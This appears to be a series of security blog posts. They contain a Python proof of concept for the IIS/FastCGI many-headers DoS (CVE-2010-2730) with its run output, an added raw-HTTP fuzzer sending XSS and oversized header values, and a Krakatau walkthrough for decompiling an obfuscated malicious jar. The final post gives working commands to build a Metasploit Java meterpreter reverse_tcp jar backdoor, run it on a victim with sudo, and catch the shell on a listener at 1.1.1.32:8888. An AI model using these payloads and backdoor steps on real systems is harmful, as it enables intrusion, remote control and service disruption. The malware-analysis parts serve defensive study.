<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ek2uomGYlaLlhhmvxTuWwET9AjX1idjBotUzoUPvlN7O4GYIW2pDc2NYiZrN5wCUpDNvqVOxm2-kxltLj1r0vuPXoQQA92S93rwkSdLaZLwkJHiWLkzV6S6LG6Qc9IRg0zwLkSFnhj7X/s1600/IISManager_FastCGI_ApplicationCreation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4ek2uomGYlaLlhhmvxTuWwET9AjX1idjBotUzoUPvlN7O4GYIW2pDc2NYiZrN5wCUpDNvqVOxm2-kxltLj1r0vuPXoQQA92S93rwkSdLaZLwkJHiWLkzV6S6LG6Qc9IRg0zwLkSFnhj7X/s1600/IISManager_FastCGI_ApplicationCreation.png" height="313" width="400" /></a></div>
<br />
If you suspect the configuration didn't go through, you can configure and verify it from the command line with appcmd.exe.<br />
<span style="font-family: Courier New, Courier, monospace;">appcmd.exe </span>is found at<br />
<span style="font-family: Courier New, Courier, monospace;">%windir%\system32\inetsrv\</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie7eQJy7T8EEASC-3YbBhiHgen8n0Zeff4VOKgIiVKAH18dl9N3UQIpDMu8p20BuNqh1qb49tLTR48WLVTtXVKq80YJtIYdzeAZpg0V97CW__PMVwxWxW0f87CmdCJTzN0u-5pGyORjWwi/s1600/iis_appcmd_fastcgi_config.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEie7eQJy7T8EEASC-3YbBhiHgen8n0Zeff4VOKgIiVKAH18dl9N3UQIpDMu8p20BuNqh1qb49tLTR48WLVTtXVKq80YJtIYdzeAZpg0V97CW__PMVwxWxW0f87CmdCJTzN0u-5pGyORjWwi/s1600/iis_appcmd_fastcgi_config.png" height="117" width="400" /></a></div>
<br />
If the FastCGI installation is successful, accessing<br />
<span style="font-family: Courier New, Courier, monospace;">http://localhost/phpinfo.php</span><br />
should show the page below. I created phpinfo.php under<br />
<span style="font-family: Courier New, Courier, monospace;">C:\Inetpub\wwwroot\</span><br />
(make sure the directory has the proper permissions).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWwk8DmcrQe0f0UdLcpXvsxKmFErcIZ8UZNfwqlyKNEpuzvjQ1r3ePGSa3ENLfjdwemnTZg9kS7OJ5SnSkiMT5HBsIsalBaPGsssSbo2TKNzwVy_vS5u-4RiuzHHI6IWvXcIgwjsyu4lWd/s1600/IIS7.0_phpinfo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWwk8DmcrQe0f0UdLcpXvsxKmFErcIZ8UZNfwqlyKNEpuzvjQ1r3ePGSa3ENLfjdwemnTZg9kS7OJ5SnSkiMT5HBsIsalBaPGsssSbo2TKNzwVy_vS5u-4RiuzHHI6IWvXcIgwjsyu4lWd/s1600/IIS7.0_phpinfo.png" height="204" width="320" /></a></div>
<br />
<b>Proof of Concept</b><br />
<pre>#!/usr/bin/python
# CVE-2010-2730 PoC (Python 2, urllib2): send one request to the FastCGI-backed
# page carrying a few hundred junk request headers.
import os, sys
import urllib2

def main(all_args):
    print "in main"
    if len(all_args) != 3:
        print "invalid args"
        print "usage:\n\t%s server_ip_addr http_port"%(all_args[0])
        sys.exit();
    headers = {"Host":all_args[1],
               "Accept": "text/html,application/xhtml+xml,application/xml",
               "Accept-Language": "en-us",
               "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
               "Keep-Alive": "115",
               "Connection": "keep-alive"}
    for k,v in headers.items():
        print (k, v)
    #create junk headers: 399 distinct "My-NameN: Praveen DarshanamN" headers
    print "Creating junk Request Headers"
    for i in range(1,400):
        junk_header = "My-Name" + str(i)
        value = "Praveen Darshanam" + str(i)
        headers.update({junk_header: value})
    url = "http://" + all_args[1] + ":" + all_args[2] + "/phpinfo.php"
    #url = "http://" + all_args[1] + "/info.php"
    print "url: " + url
    #data = "From Praveen Darshanam"
    #req = urllib2.Request(url, data, headers)
    req = urllib2.Request(url, None, headers)
    response = urllib2.urlopen(req)
    print "Response Length =" + str(len(response.read()))

if __name__ == "__main__":
    print "sys.argv=" + str(sys.argv)
    main(sys.argv)</pre>
<br />
<b>Usage</b><br />
<span style="font-family: Courier New, Courier, monospace;">./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py server_ip_addr http_port</span><br />
<span style="font-family: Courier New, Courier, monospace;">praveend@praveend-VirtualBox:~$</span><br />
<span style="color: #cc0000; font-family: Courier New, Courier, monospace;">$ ./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py 192.168.56.110 80</span><br />
<span style="font-family: Courier New, Courier, monospace;">sys.argv=['./IIS7.5_Multiple_Headers_DoS_CVE-2010-2730.py', '192.168.56.110', '80']</span><br />
<span style="font-family: Courier New, Courier, monospace;">in main</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Accept-Language', 'en-us')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Connection', 'keep-alive')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Accept', 'text/html,application/xhtml+xml,application/xml')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Keep-Alive', '115')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')</span><br />
<span style="font-family: Courier New, Courier, monospace;">('Host', '192.168.56.110')</span><br />
<span style="font-family: Courier New, Courier, monospace;">Creating junk Request Headers</span><br />
<span style="font-family: Courier New, Courier, monospace;">url: http://192.168.56.110:80/phpinfo.php</span><br />
<span style="font-family: Courier New, Courier, monospace;">Response Length =119639</span><br />
<br />
<b>Exploit Traffic</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQRi8SRzLQYOP_v5_R5WR12AFKaZQtFEfRRs9-Zj_PmSnZz3VWmHa0CK1t9LMkRKrrV6BbFeabTFwd2Tl7V5QVjD9GM3QVy3PEV1YOlyjLMWsA83KEwf1jQvrNCf68DmtR1bpFkIriLNs/s1600/pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibQRi8SRzLQYOP_v5_R5WR12AFKaZQtFEfRRs9-Zj_PmSnZz3VWmHa0CK1t9LMkRKrrV6BbFeabTFwd2Tl7V5QVjD9GM3QVy3PEV1YOlyjLMWsA83KEwf1jQvrNCf68DmtR1bpFkIriLNs/s1600/pcap.png" height="253" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
I didn't see any crash after sending multiple fake headers; I'm not sure if I interpreted the vulnerability in the correct manner.<br />
<br />
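One caveat a practitioner would raise about the PoC above: urllib2 does not put the headers on the wire as written. It rewrites every header name with capitalize() (My-Name1 becomes My-name1), sends the dict in arbitrary order and forces Connection: close, so the request the server parses is not the one the script suggests. When the question is how a server handles header counts, names and values, it is better to serialise the request yourself. The Python below is an added example, not the author's fuzzer from the Web Server/HTTP Fuzzer post above nor the PoC here; it serves both posts: a raw HTTP/1.1 request builder, the input classes the fuzzer post lists (invalid methods; header values that are XSS strings, blank or huge) and the many-headers case from this post, plus a sender that reports what came back. The probe strings, host and port are assumptions for illustration.

```python
import socket

# Constructed probe strings for the "XSS string(s)" header case.
XSS_PROBES = ["<script>alert(1)</script>", "\"><img src=x onerror=alert(1)>"]


def build_request(method="GET", path="/", host="127.0.0.1", headers=None, body=b""):
    """Serialise an HTTP/1.1 request exactly as given: header names, order and
    values go on the wire untouched (no capitalisation, no forced Connection: close)."""
    lines = ["%s %s HTTP/1.1" % (method, path), "Host: %s" % host]
    if body:
        lines.append("Content-Length: %d" % len(body))
    lines.extend("%s: %s" % (name, value) for name, value in (headers or []))
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + body


def junk_headers(count, name_prefix="My-Name", value_prefix="Praveen Darshanam"):
    """The many-headers case from the PoC above: `count` distinct, harmless headers."""
    return [("%s%d" % (name_prefix, i), "%s%d" % (value_prefix, i))
            for i in range(1, count + 1)]


def count_headers(request):
    """Number of header lines in a serialised request (request line excluded)."""
    head = request.split(b"\r\n\r\n", 1)[0]
    return len(head.split(b"\r\n")) - 1


def fuzz_cases(host, path="/"):
    """Yield (label, request) for the input classes the fuzzer post lists:
    unusual or invalid methods, header values that are XSS strings, blank or
    huge, and the many-headers case from the IIS post."""
    methods = ["GET", "OPTIONS", "TRACE", "PROPFIND", "BOGUS", "A" * 1024, ""]
    for method in methods:
        yield "method=%r" % method[:16], build_request(method, path, host)
    values = [("xss", p) for p in XSS_PROBES] + [("blank", ""), ("huge", "A" * 65536)]
    for header in ["User-Agent", "Referer", "X-Forwarded-For"]:
        for label, value in values:
            yield "%s:%s" % (header, label), build_request("GET", path, host, [(header, value)])
    yield "junk-headers=400", build_request("GET", path, host, junk_headers(400))


def send_case(host, port, request, timeout=5.0):
    """Send one raw request and return whatever comes back. An empty reply or a
    reset connection is the interesting signal when looking for a crash."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        try:
            while True:
                chunk = s.recv(65536)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass            # keep-alive server went quiet; treat what we have as the reply
        return b"".join(chunks)


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])          # e.g. 192.168.56.110 80
    for label, req in fuzz_cases(host, "/phpinfo.php"):
        try:
            reply = send_case(host, port, req)
            print("%-28s sent=%7d got=%7d" % (label, len(req), len(reply)))
        except (ConnectionError, socket.timeout) as exc:
            print("%-28s sent=%7d error=%s" % (label, len(req), exc))
```

Pair this with a debugger attached to the IIS worker process (w3wp.exe) or the FastCGI child, since a server-side fault often shows up only as a reset or an empty reply on the client side.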
<b>References</b><br />
<a href="https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx">https://technet.microsoft.com/en-us/library/dd239230(v=ws.10).aspx</a><br />
<a href="http://www.iis.net/configreference/system.webserver/fastcgi">http://www.iis.net/configreference/system.webserver/fastcgi</a><br />
<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730">http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2730</a><br />
<a href="http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html">http://www.checkpoint.com/defense/advisories/public/2013/cpai-03-dec2.html</a><br />
<a href="http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html">http://www.juniper.net/security/auto/vulnerabilities/vuln4476.html</a><br />
<a href="https://technet.microsoft.com/library/security/ms10-065">https://technet.microsoft.com/library/security/ms10-065</a>Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com2tag:blogger.com,1999:blog-1852980805947568568.post-8957962806407952922015-02-22T12:18:00.001+05:302015-02-22T12:18:10.509+05:30Java Malware: Java Decompilers for JAR Malware AnalysisKrakatau comes with three tools, an assembler, disassembler and a decompiler.<br />
From the author of Krakatau, Robert Grosse<br />
<i>" The Krakatau decompiler takes a different approach to most Java decompilers.</i><br />
<i> It can be thought of more as a compiler whose input language is Java bytecode</i><br />
<i> and whose target language happens to be Java source code. Krakatau takes in</i><br />
<i> arbitrary bytecode, and attempts to transform it to equivalent Java code. This</i><br />
<i> makes it robust to minor obfuscation, though it has the drawback of not</i><br />
<i> reconstructing the "original" source, leading to less readable output than a</i><br />
<i> pattern matching decompiler would produce for unobfuscated Java classes." </i><br />
<br />
decompile.py can extract the class files from a .jar file and decompile each extracted .class file to Java source (.java). The command below decompiles a single .class file to a .java file and places it in the praveendecompile directory:<br />
<span style="color: #cc0000;">$ python decompile.py -path . hello.class -out praveendecompile/</span><br />
<br />
Dissecting the command<br />
<span style="color: #cc0000;">$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar</span><br />
-out output directory for the generated .java files<br />
-path path to the core language classes (rt.jar), directories or jars<br />
-skip continue upon errors<br />
<br />
<span style="color: #cc0000;">$ python decompile.py -out temp_praveen/ 2f8d204b747ed971a8bc8927b2e0898c.jar</span><br />
<span style="font-family: Courier New, Courier, monospace;">Krakatau Copyright (C) 2012-14 Robert Grosse</span><br />
<span style="font-family: Courier New, Courier, monospace;">This program is provided as open source under the GNU General Public License.</span><br />
<span style="font-family: Courier New, Courier, monospace;">See LICENSE.TXT for more details.</span><br />
<span style="font-family: Courier New, Courier, monospace;">Attempting to automatically locate the standard library...</span><br />
<span style="font-family: Courier New, Courier, monospace;">Found at /usr/lib/jvm/java-1.7.0-openjdk-i386/jre/lib/rt.jar</span><br />
<span style="font-family: Courier New, Courier, monospace;">processing target plugins/Server, 2 remaining</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading plugins/Server</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/Object</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/Throwable</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/io/Serializable</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/IllegalMonitorStateException</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/RuntimeException</span><br />
<span style="font-family: Courier New, Courier, monospace;">Loading java/lang/Exception</span><br />
<span style="font-family: Courier New, Courier, monospace;">Decompiling method &lt;init&gt; ()V<br />
Decompiling method onLine ()V<br />
Decompiling method offLine ()V<br />
Decompiling method getId ()Ljava/lang/String;<br />
<b>Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/plugins/Server.java</b><br />
0.369355201721 seconds elapsed<br />
processing target Main, 1 remaining<br />
Loading Main<br />
Loading java/lang/ClassLoader<br />
Loading java/io/InputStream<br />
Loading java/io/Closeable<br />
Loading java/lang/AutoCloseable<br />
Loading java/io/ByteArrayInputStream<br />
Loading java/io/PrintStream<br />
Loading java/io/FilterOutputStream<br />
Loading java/io/OutputStream<br />
Loading java/io/Flushable<br />
Loading java/lang/Appendable<br />
Loading java/lang/String<br />
Loading java/lang/Comparable<br />
Loading java/lang/CharSequence<br />
Loading java/util/jar/JarInputStream<br />
Loading java/util/zip/ZipInputStream<br />
Loading java/util/zip/InflaterInputStream<br />
Loading java/io/FilterInputStream<br />
Loading java/util/zip/ZipConstants<br />
Loading java/lang/OutOfMemoryError<br />
Loading java/lang/VirtualMachineError<br />
Loading java/lang/Error<br />
<b>Decompiling method iiIiiiiiii </b>([BLjava/lang/String;)Ljava/util/jar/JarInputStream;<br />
Loading java/util/HashMap<br />
Loading java/util/AbstractMap<br />
Loading java/util/Map<br />
Loading java/lang/Cloneable<br />
Loading java/lang/ClassCastException<br />
Loading java/lang/NullPointerException<br />
Decompiling method getResourceAsStream (Ljava/lang/String;)Ljava/io/InputStream;<br />
Loading java/util/jar/JarEntry<br />
Loading java/util/zip/ZipEntry<br />
<b>Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd </b>(Ljava/util/jar/JarEntry;)Ljava/lang/String;<br />
Loading java/lang/ClassNotFoundException<br />
Loading java/lang/ReflectiveOperationException<br />
Loading java/lang/Class<br />
Loading java/lang/reflect/GenericDeclaration<br />
Loading java/lang/reflect/Type<br />
Loading java/lang/reflect/AnnotatedElement<br />
Decompiling method findClass (Ljava/lang/String;)Ljava/lang/Class;<br />
Decompiling method iiIiiiiiii (Ljava/util/jar/JarInputStream;)V<br />
Loading java/io/ByteArrayOutputStream<br />
Decompiling method &lt;init&gt; ()V<br />
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/util/jar/JarInputStream;)Ljava/util/jar/JarEntry;<br />
Decompiling method iiIiiiiiii ()V<br />
Loading java/lang/StackTraceElement<br />
Loading java/lang/StringBuffer<br />
Loading java/lang/AbstractStringBuilder<br />
Loading java/lang/ArrayIndexOutOfBoundsException<br />
Loading java/lang/IndexOutOfBoundsException<br />
Loading java/lang/NegativeArraySizeException<br />
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;)Ljava/lang/String;<br />
Loading java/lang/reflect/Method<br />
Loading java/lang/reflect/AccessibleObject<br />
Loading java/lang/reflect/Member<br />
Decompiling method main ([Ljava/lang/String;)V<br />
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/lang/String;[B)Ljava/lang/Class;<br />
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ()Ljava/io/InputStream;<br />
Loading java/io/Reader<br />
Loading java/lang/Readable<br />
Loading java/io/InputStreamReader<br />
Loading java/io/BufferedReader<br />
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/InputStream;)Ljava/lang/String;<br />
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd (Ljava/io/ByteArrayOutputStream;)[B<br />
Decompiling method loadClass (Ljava/lang/String;)Ljava/lang/Class;<br />
Loading java/lang/StringBuilder<br />
Decompiling method ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd ([BLjava/lang/String;)[B<br />
<b>Class written to /home/praveend/javadecompilers/Krakatau/temp_praveen/Main.java</b><br />
15.0299580097 seconds elapsed</span><br />
*********************************************************<br />
The important parts of the decompilation are highlighted in bold.<br />
<br />
The decompilation above creates a couple of files under the temp_praveen directory:<br />
<span style="font-family: Courier New, Courier, monospace;">praveend@praveend-VirtualBox:~/javadecompilers/Krakatau/temp_praveen$</span><br />
<span style="font-family: Courier New, Courier, monospace;">$ ls -R</span><br />
<span style="font-family: Courier New, Courier, monospace;">Main.java plugins</span><br />
<span style="font-family: Courier New, Courier, monospace;">./plugins:</span><br />
<span style="font-family: Courier New, Courier, monospace;">Server.java</span><br />
<div>
<br /></div>
<div>
Rename 2f8d204b747ed971a8bc8927b2e0898c.jar to 2f8d204b747ed971a8bc8927b2e0898c.zip and unzip the zip file (running unzip directly on the .jar file might work, but I did not try it)</div>
<div>
<div>
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$</div>
<div>
<span style="color: #cc0000;">$ unzip 2f8d204b747ed971a8bc8927b2e0898c.zip </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Archive: 2f8d204b747ed971a8bc8927b2e0898c.zip</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: META-INF/MANIFEST.MF </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: MANIFEST.MF </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: ID </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: plugins/Server.class </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> inflating: Main.class </span> </div>
<div>
praveend@praveend-VirtualBox:~/javadecompilers/Krakatau$</div>
</div>
<div>
<br /></div>
disassemble.py takes a class or jar file as input and converts it into Krakatau's assembly format; the output is saved to a .j file and can be reassembled with assemble.py. If a jar file is given as input, every class file in the jar is disassembled into its own .j file.<br />
<span style="color: #cc0000;">python disassemble.py Main.class</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">$ python ../disassemble.py Main.class </span><br />
<span style="font-family: Courier New, Courier, monospace;">processing target Main.class, 1/1 remaining</span><br />
<span style="font-family: Courier New, Courier, monospace;">Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/Main.j</span><br />
<span style="font-family: Courier New, Courier, monospace;">0.280933856964 seconds elapsed</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs_aJJYrxXhZABwmUIT91DEJVNinlGr1oTTygF-yd0pmrBylJ22fjNFGquRQAwr4P2opmcbxL1GQbYW4QhizVdlb24iOEn5XIRJvQu07ogJiI9ur_UWSkf3q-AIC63npuk0I0_v1o4ioWP/s1600/disassembled_code_snippet_mainj.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs_aJJYrxXhZABwmUIT91DEJVNinlGr1oTTygF-yd0pmrBylJ22fjNFGquRQAwr4P2opmcbxL1GQbYW4QhizVdlb24iOEn5XIRJvQu07ogJiI9ur_UWSkf3q-AIC63npuk0I0_v1o4ioWP/s1600/disassembled_code_snippet_mainj.png" height="218" width="400" /></a></div>
<br />
The javap binary is included with the JDK installation; javap -c prints the bytecode of a class:<br />
<div>
<span style="color: #cc0000;">$javap -c Main.class</span> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjPd7EULpjhmoKo97NLutVn8Y0Nozz1a_x59sIvGtmkURTgiBY-x9xQ1FAywPxRBMXrSP9rqCH4GIS3FlaJga_DUHXe3kZ2JDKIy13VjTt9q9jAwlvbD6czOsfXuiJupGEuEg1C3YfJGcS/s1600/disassembled_code_snippet_javap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjPd7EULpjhmoKo97NLutVn8Y0Nozz1a_x59sIvGtmkURTgiBY-x9xQ1FAywPxRBMXrSP9rqCH4GIS3FlaJga_DUHXe3kZ2JDKIy13VjTt9q9jAwlvbD6czOsfXuiJupGEuEg1C3YfJGcS/s1600/disassembled_code_snippet_javap.png" height="200" width="400" /></a></div>
<br />
assemble.py converts a Krakatau assembly file (.j) back into a class file in the JVM class file format:<br />
<span style="color: #cc0000;">python assemble.py Main.j</span><br />
<span style="color: #cc0000;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">$ python ../../assemble.py Server.j</span><br />
<span style="font-family: Courier New, Courier, monospace;">Processing file Server.j, 1/1 remaining</span><br />
<span style="font-family: Courier New, Courier, monospace;">Class written to /home/praveend/javadecompilers/Krakatau/unzipped_malware/plugins/Server.class</span><br />
<br />
Java malware may use various obfuscation techniques to make analysis harder for malware analysts and detection devices. Errors encountered during decompilation may need to be fixed manually.<br />
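As an added example (not Krakatau's code and not the sample from this post), the triage step an analyst does before decompiling can be scripted: a jar is a zip, so each .class entry is pulled out, its constant pool and method table are parsed, and method names that look machine-generated are flagged so the analyst knows which classes to expect trouble from. The class files and jar used below are constructed in the script itself so that it runs offline; the name heuristic (runs of i/I/l, or the ALLATORIxDEMO marker seen in the decompiler output above) is an assumption, not a published signature.

```python
import io
import re
import struct
import zipfile

CLASS_MAGIC = 0xCAFEBABE
# Payload size of fixed-length constant pool entries (JVM spec 4.4);
# CONSTANT_Utf8 (tag 1) is variable-length and handled separately.
FIXED_SIZE = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
              15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Heuristic only (assumption): runs of i/I/l, or the Allatori demo marker
# that appears in the decompiler output above.
OBFUSCATED_NAME = re.compile(r"^[iIl]{4,}$|ALLATORI")


def _skip_member(data, pos):
    """Skip one field_info/method_info (6 bytes + attributes); return new offset."""
    (attr_count,) = struct.unpack(">H", data[pos + 6:pos + 8])
    pos += 8
    for _ in range(attr_count):
        (length,) = struct.unpack(">I", data[pos + 2:pos + 6])
        pos += 6 + length
    return pos


def parse_class(data):
    """Return (class name, major version, method names); walks only the
    constant pool and the method table, skipping all attributes."""
    if len(data) < 10 or struct.unpack(">I", data[:4])[0] != CLASS_MAGIC:
        raise ValueError("not a class file")
    _minor, major, cp_count = struct.unpack(">HHH", data[4:10])
    cp = [None] * cp_count  # constant pool is 1-based; slot 0 is unused
    pos, i = 10, 1
    while i < cp_count:
        tag = data[pos]
        pos += 1
        if tag == 1:  # CONSTANT_Utf8: u2 length followed by the bytes
            (length,) = struct.unpack(">H", data[pos:pos + 2])
            cp[i] = data[pos + 2:pos + 2 + length].decode("utf-8", "replace")
            pos += 2 + length
        elif tag in FIXED_SIZE:
            if tag == 7:  # CONSTANT_Class: remember name_index for this_class
                cp[i] = ("class", struct.unpack(">H", data[pos:pos + 2])[0])
            pos += FIXED_SIZE[tag]
        else:
            raise ValueError("unknown constant pool tag %d" % tag)
        i += 2 if tag in (5, 6) else 1  # Long/Double occupy two slots
    _flags, this_class, _super, iface_count = struct.unpack(">HHHH", data[pos:pos + 8])
    pos += 8 + 2 * iface_count
    (field_count,) = struct.unpack(">H", data[pos:pos + 2])
    pos += 2
    for _ in range(field_count):
        pos = _skip_member(data, pos)
    (method_count,) = struct.unpack(">H", data[pos:pos + 2])
    pos += 2
    names = []
    for _ in range(method_count):
        names.append(cp[struct.unpack(">H", data[pos + 2:pos + 4])[0]])
        pos = _skip_member(data, pos)
    return cp[cp[this_class][1]], major, names


def triage_jar(jar_bytes):
    """A jar is a zip: parse every .class entry and flag suspicious method names."""
    report = []
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for entry in zf.namelist():
            if entry.endswith(".class"):
                cls, major, methods = parse_class(zf.read(entry))
                report.append({"entry": entry, "class": cls, "major": major, "methods": methods,
                               "suspicious": [m for m in methods if OBFUSCATED_NAME.search(m)]})
    return report


def build_sample_class(class_name, method_names):
    """Constructed sample: a minimal, code-free but well-formed class file (not real malware)."""
    pool = []

    def utf8(s):
        b = s.encode("utf-8")
        pool.append(b"\x01" + struct.pack(">H", len(b)) + b)
        return len(pool)  # 1-based index of the entry just added

    def cls(name_index):
        pool.append(b"\x07" + struct.pack(">H", name_index))
        return len(pool)

    this_idx, super_idx = cls(utf8(class_name)), cls(utf8("java/lang/Object"))
    desc_idx = utf8("()V")
    methods = b"".join(struct.pack(">HHHH", 0x0001, utf8(m), desc_idx, 0) for m in method_names)
    out = struct.pack(">IHHH", CLASS_MAGIC, 0, 52, len(pool) + 1) + b"".join(pool)
    out += struct.pack(">HHHH", 0x0021, this_idx, super_idx, 0)  # flags, this, super, no interfaces
    out += struct.pack(">H", 0)  # fields_count
    out += struct.pack(">H", len(method_names)) + methods
    return out + struct.pack(">H", 0)  # class attributes_count


def build_sample_jar():
    """Constructed jar mirroring the layout unzipped above (Main.class, plugins/Server.class)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Main\n")
        zf.writestr("Main.class", build_sample_class("Main", [
            "<init>", "iiIiiiiiii", "ALLATORIxDEMOxapqldkjnfkqieurqoewqeqwdasdascasdasd", "main"]))
        zf.writestr("plugins/Server.class", build_sample_class(
            "plugins/Server", ["<init>", "onLine", "offLine", "getId"]))
    return buf.getvalue()


if __name__ == "__main__":
    for r in triage_jar(build_sample_jar()):
        print(r["entry"], r["class"], "major", r["major"], "suspicious:", r["suspicious"])
```

On a real sample, pass the bytes of the jar to triage_jar() instead of build_sample_jar(); the major version tells you which JDK the class was compiled for, and the flagged classes are the ones whose .j output from disassemble.py will need the most manual work.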
<br />
<a href="http://research.zscaler.com/2013/08/malicious-jar-files-hosted-on-google.html">http://research.zscaler.com/2013/08/malicious-jar-files-hosted-on-google.html</a><br />
<a href="http://stackoverflow.com/questions/27340147/how-to-decompile-class-and-jar-file-using-storyyeller-krakatau">http://stackoverflow.com/questions/27340147/how-to-decompile-class-and-jar-file-using-storyyeller-krakatau</a><br />
<a href="https://github.com/Storyyeller/Krakatau/blob/master/README.TXT">https://github.com/Storyyeller/Krakatau/blob/master/README.TXT</a><br />
<a href="https://raw.githubusercontent.com/Storyyeller/Krakatau/master/Documentation/assembler.txt">https://raw.githubusercontent.com/Storyyeller/Krakatau/master/Documentation/assembler.txt</a><br />
<br />Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com3tag:blogger.com,1999:blog-1852980805947568568.post-60435491939169204432015-02-21T01:09:00.000+05:302015-02-21T01:09:05.721+05:30Compromising machines running Linux using Metasploit JAR BackdoorsWe can compromise a Windows machine using a malicious EXE file, generated with Metasploit, that acts as a backdoor. Machines running Linux can likewise be compromised using jar backdoors.<br />
<br />
Creating a jar backdoor file with Metasploit msfpayload to hack a Linux box:<br />
<span style="color: #cc0000;">root@kali-praveend-attacker:~# msfpayload java/meterpreter/reverse_tcp LHOST=1.1.1.32 LPORT=8888 R > compromise.jar</span><br />
[!] ************************************************************************<br />
[!] * The utility msfpayload is deprecated! *<br />
[!] * It will be removed on or about 2015-06-08 *<br />
[!] * Please use msfvenom instead *<br />
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *<br />
[!] ************************************************************************<br />
<br />
Execute the jar file created above on the Linux box:<br />
<span style="color: #cc0000;">praveen@victim:/tmp$ sudo java -jar compromise.jar</span><br />
<br />
On Kali, run the commands below so that the victim connects back to the attacker when it executes the JAR backdoor:<br />
<span style="color: #cc0000;">msf > use exploit/multi/handler</span><br />
<span style="color: #cc0000;">msf exploit(handler) > set payload java/meterpreter/reverse_tcp</span><br />
<span style="color: #cc0000;">msf exploit(handler) > set LHOST 1.1.1.32</span><br />
<span style="color: #cc0000;">LHOST => 1.1.1.32</span><br />
<span style="color: #cc0000;">msf exploit(handler) > set LPORT 8888</span><br />
<span style="color: #cc0000;">LPORT => 8888</span><br />
<span style="color: #cc0000;">msf exploit(handler) > exploit</span><br />
<span style="color: #cc0000;">msf exploit(handler) > show options</span><br />
